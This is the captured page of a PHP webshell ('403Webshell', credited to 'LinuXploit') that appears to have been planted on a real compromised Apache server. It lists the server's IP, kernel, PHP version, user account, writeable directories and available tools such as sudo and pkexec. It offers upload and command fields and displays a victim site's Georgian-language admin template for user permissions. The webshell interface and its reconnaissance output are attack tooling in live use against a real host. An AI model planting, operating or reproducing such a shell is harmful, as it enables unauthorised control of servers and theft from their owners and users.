403Webshell
Server IP : 80.241.246.6  /  Your IP : 216.73.216.188
Web Server : Apache/2.4.25 (Debian)
System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User : www-data ( 33)
PHP Version : 7.0.33-0+deb9u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/kharagauli_new/moduls/users/admin/templates_1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/kharagauli_new/moduls/users/admin/templates_1/index.tpl
{extends file=$menu.dir|cat:"base.tpl"}

{block name="scripts"}
        <script type="text/javascript" src="{$menu.self_dir}/js/main.js"></script>

{/block}
{block name="css"}
    <link rel="stylesheet" href="{$menu.self_dir}/css/style.css" type="text/css">
{/block}
{block name="body"}
    <div id="content">

        <!-- Content wrapper -->
        <div class="wrapper">
                             

          <!-- Action tabs -->
          {include file=$menu.dir|cat:"action_bars.tpl"}
          <!-- /action tabs --> 
          
                <!-- Media datatable -->
              <form onsubmit="return send_form(true)" method="post" enctype="multypart/form-data">  
                <div class="widget"> 
                      <div class="well well_for_users">
                        <div class="control-group">
                          <table style="width:100%">
                            <tr>
                              <td>
                                მომხმარებელი
                              </td>
                              <td>
                                პაროლი
                              </td>
                            </tr>
                            <tr>
                               <td>
                                <input type="text" name="name" value="{$menu.select_body.name}" placeholder="მომხმარებელი">  
                              </td>
                              <td>
                                <input type="text" name="pass" placeholder="{$menu.select_body.pass}"> 
                              </td>
                            </tr>
                            </tr>
                          </table>     
                          

                        </div>
                      </div>

                      <div class="well">
                        <div class="control-group">
                         <table border="1" class="view_table">
                              <tr>
                                <td style="text-align:center"></td>
                                {section name=users loop=$menu.struct.users}
                                    <td>{$menu.struct.users[users]}</td>
                                {/section}
                              </tr>
                              {section name=combine loop=$menu.struct.questions_users}
                              <tr>
                                <td>
                                  <b>{$menu.struct.questions_users_titles[combine]}</b>
                                </td>
                                {assign var=md value=$menu.select_body.permission}
                                {section name=users loop=$menu.struct.users}
                                    {if $smarty.section.users.index == 0}
                                      <td><input onchange="must_hide(this)" {if isset($md->{$menu.struct.questions_users[combine]}) and in_array($menu.struct.users[users],$md->{$menu.struct.questions_users[combine]})}checked="checked"{/if} type="checkbox" name="{$menu.struct.questions_users[combine]}_{$menu.struct.users[users]}_{$menu.struct.questions_users[combine]}"></td>
                                    {else}
                                      <td><input type="checkbox" class="must_hide{if not isset($md->{$menu.struct.questions_users[combine]}) or not in_array('view',$md->{$menu.struct.questions_users[combine]})} must_hide_action{/if}" {if isset($md->{$menu.struct.questions_users[combine]}) and in_array($menu.struct.users[users],$md->{$menu.struct.questions_users[combine]})}checked="checked"{/if} name="{$menu.struct.questions_users[combine]}_{$menu.struct.users[users]}_{$menu.struct.questions_users[combine]}"></td>
                                    {/if}
                                {/section}
                              </tr>
                              {/section}
                          </table> 

                          <br/>
                          <table border="1" class="view_table">
                              <tr>
                                <td style="text-align:center"></td>
                                {section name=choose loop=$menu.struct.choose}
                                    <td>{$menu.struct.choose[choose]}</td>
                                {/section}
                              </tr>
                              {section name=combine loop=$menu.struct.combine_map_home}
                                  <tr>
                                    <td>
                                      <b>{$menu.struct.combine_map_home_title[combine]}</b>
                                    </td>
                                    {section name=choose loop=$menu.struct.choose}
                                          <td><input {if isset($md->{$menu.struct.combine_map_home[combine]}) and in_array($menu.struct.choose[choose],$md->{$menu.struct.combine_map_home[combine]})}checked="checked"{/if} type="checkbox" name="{$menu.struct.combine_map_home[combine]}_{$menu.struct.choose[choose]}_choose"></td>
                                    {/section}
                                  </tr>
                              {/section}    
                          </table>
                          <br/>

                          <table border="1" class="view_table">
                              <tr>
                                <td style="text-align:center"></td>
                                {section name=cmb_sts_clmns loop=$menu.struct.cmb_sts_clmns}
                                    <td>{$menu.struct.cmb_sts_clmns[cmb_sts_clmns]}</td>
                                {/section}
                              </tr>
                              {section name=cmb_sts_log loop=$menu.struct.cmb_sts_log}
                                  <tr>
                                    <td>
                                      <b>{$menu.struct.cmb_sts_log_title[cmb_sts_log]}</b>
                                    </td>
                                    {section name=cmb_sts_clmns loop=$menu.struct.cmb_sts_clmns}
                                          <td><input {if isset($md->{$menu.struct.cmb_sts_log[cmb_sts_log]}) and in_array('view',$md->{$menu.struct.cmb_sts_log[cmb_sts_log]})}checked="checked"{/if} type="checkbox" name="{$menu.struct.cmb_sts_log[cmb_sts_log]}_view_view"></td>
                                    {/section}
                                  </tr>
                               {/section}
                          </table>  
                          <br/>

                           <table border="1" class="view_table view_table_2">
                              <tr>
                                <td style="text-align:center">მენიუ</td>
                                {section name=menu loop=$menu.struct.menu}
                                    <td>{$menu.struct.menu[menu]}</td>
                                {/section}
                              </tr>
                              <tr>
                                <td>
                                  <b>მენიუ</b>
                                </td>
                                {section name=menu loop=$menu.struct.menu}
                                    {if $smarty.section.menu.index == 0}
                                      <td><input class="hide_show_menu" onchange="must_hide(this)" type="checkbox" {if isset($md->menu) and in_array($menu.struct.menu[menu],$md->menu)}checked="checked"{/if} name="menu_{$menu.struct.menu[menu]}_menu"></td>
                                    {else}
                                      <td><input type="checkbox" class="must_hide{if not isset($md->menu) or not in_array('view',$md->menu)} must_hide_action{/if}" {if isset($md->menu) and in_array($menu.struct.menu[menu],$md->menu)}checked="checked"{/if} name="menu_{$menu.struct.menu[menu]}_menu"></td>
                                    {/if}
                                {/section} 
                              </tr>
                          </table> 
                          <br/>
                          <table id="play_on_display" border="1" class="view_table{if not isset($md->menu) or not in_array('view',$md->menu)} display_none{/if}">
                              <tr>
                                <td style="text-align:center">გვერდები მენიუდან</td>
                                {section name=menu_pages loop=$menu.struct.menu_pages}
                                      <td>{$menu.struct.menu_pages[menu_pages]}</td>
                                {/section}
                              </tr>
                              {section name=table loop=$_class_->_menu_}
                              {assign var=bds value=$_class_->_menu_[table]}  
                                <tr>
                                  <td title="{$bds.{"name_"|cat:$menu.lang_choised[0]}}">
                                    {$bds.{"name_"|cat:$menu.lang_choised[0]}}
                                  </td>
                                {section name=menu_pages loop=$menu.struct.menu_pages}  
                                    {if $smarty.section.menu_pages.index == 0}
                                       <td>
                                        <input onchange="must_hide(this)" {if isset($md->{$bds.id}) and in_array($menu.struct.menu_pages[menu_pages],$md->{$bds.id})}checked="checked"{/if} type="checkbox" name="menus_{$menu.struct.menu_pages[menu_pages]}_{$bds.id}">
                                      </td>
                                    {else}
                                       <td{if in_array($_class_->_menu_[table].category,[1,2]) and not in_array($menu.struct.menu_pages[menu_pages],['edit'])} class="for_visibility"{/if}>
                                        <input class="must_hide{if not isset($md->{$bds.id}) or not in_array('view',$md->{$bds.id})} must_hide_action{/if}" {if isset($md->{$bds.id}) and in_array($menu.struct.menu_pages[menu_pages],$md->{$bds.id})}checked="checked"{/if} type="checkbox" name="menus_{$menu.struct.menu_pages[menu_pages]}_{$bds.id}">
                                      </td>
                                    {/if}
                                {/section}
                              </tr>
                              {/section} 
                          </table> 
                                
                            
                        </div>
                        <div class="sends_option">   
                              <input class="button" type="submit" value='send'/>
                        </div> 
                      </div>
                </div>
              </form>  
                <!-- /media datatable -->
 
        </div>
        <!-- /content wrapper -->

    </div>

                
                
{/block}


Youez - 2016 - github.com/yon3zu
LinuXploit